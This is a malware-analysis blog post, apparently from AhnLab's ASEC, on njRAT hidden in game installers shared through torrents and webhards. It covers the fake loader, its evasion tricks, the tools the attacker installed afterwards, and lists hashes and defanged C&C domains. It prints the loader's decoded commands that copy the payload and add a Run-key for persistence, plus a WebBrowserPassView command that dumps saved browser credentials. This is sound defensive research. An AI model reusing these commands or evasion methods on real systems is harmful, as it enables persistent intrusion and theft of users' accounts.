njRAT Being Distributed through Webhards and Torrents

njRAT is a RAT malware that can perform various malicious activities after receiving commands from the attacker. Because it provides various features such as file downloading, command execution, keylogging, and user account information extortion, it has been steadily used by attackers since the past.

Also, since one can easily find builders on the Internet, the malware is distributed in various forms to target domestic users. The most typical method is using torrents and webhards to distribute it under a disguise of a normal file. The njRAT malware was examined multiple times in the ASEC blog before.

Because a well-known malware such as njRAT is easily blocked by security programs, attackers are using various means to bypass detection. In this post, the team will explain the distribution method and infection flow of the recently distributed njRAT, as well as the malware confirmed to have been additionally installed by the attacker.

Starting from this year, the attacker has been distributing njRAT with game installers mainly through torrents. Recently, there have also been cases of malware being distributed via webhards. We do no know that the attacker directly uploaded it, or an uploader uploaded the downloaded file. The following is the malware that can be downloaded from a certain webhard. The title of the page is ‘[Very Positive/Pixel Action Game] LostRuins-Chronos,’ and included in the page is an archive file named LostRuins.zip which contains game files.

Webhard download page

Similar to the example shown above, there are other cases of the malware being distributed with game files via torrent, and as seen from the examples below, target filepaths and filenames of the cases are similar to each other (the file targets only ‘vxrlib86.dll,’ but as it is not run directly, the actual malware exists separately).

\survival.z-unleashed\data\vxrlib86.dll
\hundred days – winemaking simulator\data\vxrlib86.dll
\teamfight.manager.v1.2.0\data\vxrlib86.dll
\lacuna.a.sci-fi.noir.adventure.v1.0.3\data\vxrlib86.dll
\until we die\data\vxrlib86.dll
\cardnarok – raid with gods\data\vxrlib86.dll

Upon decompressing the file, its inner content is shown. Users who have downloaded the game will think Lostruins.exe is the executable of the game after seeing the icon and file name and execute it.

Decompressing the file

However, the Lostruins.exe file is actually a malware loader. The actual game executable Lostruins.exe exists as Maindata.dll. The loader runs Maindata.dll and the malware, meaning that both the game and the njRAT malware are run at the same time. Such a method of disguising as a normal program and running both the normal program and malware is similar to the previous method of distribution.

Upon taking a closer look at the loader Lostruins.exe, one can see that it has a routine that checks the current date upon execution and if the date is June 4th and later, creates an exception and terminates the program. This means that the malware operates only until June 3rd, 2021. Also, it checks whether the actual game file ‘Maindata.dll’ exists in the current directory. If the file doesn’t exist, the loader is terminated.

Malware made to operate until June 3rd

Afterward, it copies the two files ‘vmxlib98.dll’ and ‘vxrlib86.dll’ in the data folder to the ‘Program Data’ folder and executes them. Lastly, it registers the files into Run Key so that they can be run even after a reboot. The strings used for this task are originally encoded and are decoded for use during the execution. The image below shows a part of the main() function, a result of decoding the encoded string.

Main function (decoded string)

> cmd.exe start Maindata.dll && cd data && copy /y vmxlib98.dll %PROGRAMDATA% && copy /y vxrlib86.dll %PROGRAMDATA%\vxrlib86.exe
> reg add “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “Start” /t REG_SZ /d “C:\Windows\System32\cmd.exe /c start C:\ProgramData\vxrlib86.exe” /f

In the past, the malware existed as a single exe file, meaning that double-clicking it was enough to kickstart the malware activity. Yet in this case, the vxrlib86.exe file alone cannot be run on its own and requires vmxlib98.dll file to exist in the same directory.

As the routine of Vxrlib86.exe consists only of the following function, it cannot be run on its own. In other words, because Frp class is not implemented, it cannot call Spr() method of the Frp class.

Routine of vxrlib86.exe

But upon taking a closer look, one can see that it references the vmxlib98 library. When the vmxlib98.dll file exists in the same directory, it will call the Spr() method of the Frp class implemented in that file.

Library that vxrlib86.exe references

The Spr() method implemented in the vmxlib98 library decodes the encoded data and goes through Assembly.Load() and Assembly.Invoke() to run the data in memory. The decrypted code is the actual njRAT.

C&C server of njRAT

C&C URL of njRAT: ipipip1079.kro[.]kr:449

By including the time condition and implementing other restrictions, the attacker disallows files from being run on their own. This is the attacker’s disruption technique which prevents malicious behaviors from being activated on security devices such as Sandbox. Such features are what distinguishes it from other types of njRAT that were introduced in previous blog posts. The attacker has been and is continuously adding features to evade analysis and detection.

Next, the team will examine additional malware installed in the infected PC by the attacker using this njRAT malware. First, there are other forms of njRAT. The attacker has changed files as well as C&C URLs when installing them. It is speculated that this is to install additional njRAT in case of C&C URLs being blocked.

C&C URL of additional njRAT 1: discordpff.kro[.]kr:449
C&C URL of additional njRAT 2: dltlgn071105.kro[.]kr:1

There is a history of the attacker installing and running Nirsoft’s WebBrowserPassView tool. As its name indicates, the program extracts and shows the account information saved in the web browser. The attacker can give the /stext argument to run it, creating the extracted account information as a text file without GUI. As such, the tool is often used by attackers. For instance, HawkEye keylogger also uses WebBrowserPassView with the /stext argument.

Upon seeing the command line that is actually run, WebBrowserPassView is installed as nirsoft.exe, and the web browser account information of the infected PC is created as browser.txt.

> cmd.exe /c c:\users\[user name]\appdata\roaming\nirsoft.exe /stext c:\users\[user name]\appdata\roaming\browser.txt

Besides njRAT malware, the attacker has also installed a simple RAT malware named Simple UPD RAT. As you can see, it is an open-source DDoS RAT malware that also exists in GitHub.

Simple UDP Rat

It is a simple malware that supports only UDP DDoS attacks. Because it exists as a source code and does not have a builder, attackers need to build it on their own. The following are the pdb paths that were created when the attacker built Simple UDP Rat. If you search the keyword UDPnet, you can guess that the open-source Simple UDP Rat has been domestically sold as an attack tool.

Attacker’s PDB information

– C:\Users\tomag\OneDrive\Desktop\Vexxie\Mycracking tool\UDPNET Source\Simple-UDP-Rat-master\Client\x64\Release\Client.pdb
– C:\Users\Administrator\Desktop\UDPnet KimDdalddal only\UDPnet KimDdalddal\Client\x64\Debug\Client.pdb

One thing to note is that one of the Simple UDP Rat samples was installed by njRAT as a file infected with Win32/Neshta virus. It is highly likely that this was not the attacker’s intention, but that the attacker’s PC was already infected with the Neshta virus.

Lastly, the attack may create malware that locks the infected PC’s screen and prompts the user to reboot. Upon rebooting, the malware creates text files named “UR NEXT” and infinitely creates message boxes with the message “run away” to prevent the user from using the PC. The icon of the text file is also changed to a red-colored square showing the “UR NEXT” string as shown below.

“run away” message box

As shown in the examples above, the malware is being distributed actively via file-sharing websites such as torrents and domestic webhards. As such, caution is advised when approaching executables downloaded from a file-sharing website. We recommend users to download products from the official websites of developers.

[File Detection]
– Lostruins.exe: Trojan/Win.Loader.R424256 (2021.06.06.01)
– vxrlib86.dll: Trojan/Win.Loader.C4514255 (2021.06.05.03)
– vmxlib98.dll: Backdoor/Win.NJRat.C4514331 (2021.06.06.01)
– additional njRAT1: Malware/Win.AGEN.C4498507 (2021.05.29.02)
– additional njRAT2: Backdoor/Win.NJRat.R44258 (2021.06.06.01)
– WebBrowserPassView: HackTool/Win.WebBrowserPassView.R347116 (2020.08.07.04)
– Simple UDP Rat: Backdoo/Win.UDPRat.C4514332 (2021.06.06.01)
– Simple UDP Rat (infected with Neshta virus): Win32/Neshta
– PC Lock: Trojan/Win32.Bluteal.C3153992 (2019.04.15.08)

[Behavior Detection]
– Malware/MDP.SystemManipulaction.M1653

[IOC]

Files
– Lostruins.exe: ba381adf2fde246ebaad5abac41377c8
– vxrlib86.dll: 06dbe94fcfe085cdfc38b4d1f3f3c79c
– vmxlib98.dll: 22c508e562dd4929423f9941e0a757ef
– additional njRAT1: 55c94048da37a96bbc09915bf17253fd
– additional njRAT2: 719416e4cc1d88f9e6c12605d29bf446
– WebBrowserPassView: 053778713819beab3df309df472787cd
– Simple UDP Rat: 0ceefba0a10805d7919d742da8fe6116
– Simple UDP Rat (infected with Neshta virus): af375fb484e87f8921e8f1fad3d4d97a
– PC Lock: d5671758956b39e048680b6a8275e96a

C&C Server
– C&C URL of njRAT distributed in webhards: ipipip1079.kro[.]kr:449
– C&C URL of additional njRAT 1: discordpff.kro[.]kr:449
– C&C URL of additional njRAT 2: dltlgn071105.kro[.]kr:1
– C&C URL of UDP RAT: ipipip1079.kro[.]kr:4433
– C&C URL of UDP RAT (infected with Neshta virus): discord.n-e[.]kr:4433

The post njRAT Being Distributed through Webhards and Torrents appeared first on ASEC BLOG.

Article Link: https://asec.ahnlab.com/en/24393/